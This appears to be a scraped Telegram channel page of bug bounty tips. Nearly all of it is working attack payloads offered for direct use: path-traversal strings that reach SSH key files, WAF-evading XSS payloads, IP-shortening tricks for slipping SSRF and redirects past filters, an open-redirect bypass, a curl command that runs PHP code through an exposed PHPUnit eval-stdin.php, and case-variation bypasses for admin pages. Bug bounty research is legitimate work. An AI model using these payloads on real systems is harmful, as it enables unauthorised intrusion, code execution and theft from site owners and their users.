Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
#bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
#bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)
Recently found a RXSS in captcha response
Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger

#BugBounty #BugBountyTip #BugBountyTips
Bugbounty tips#3

Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked

Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1

#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#BugBounty #BugBountyTip #WAF #infosec
Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
#bugbountytip If you found /phpunit/ folder than you can try to execute PHP code by typing the following command:
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty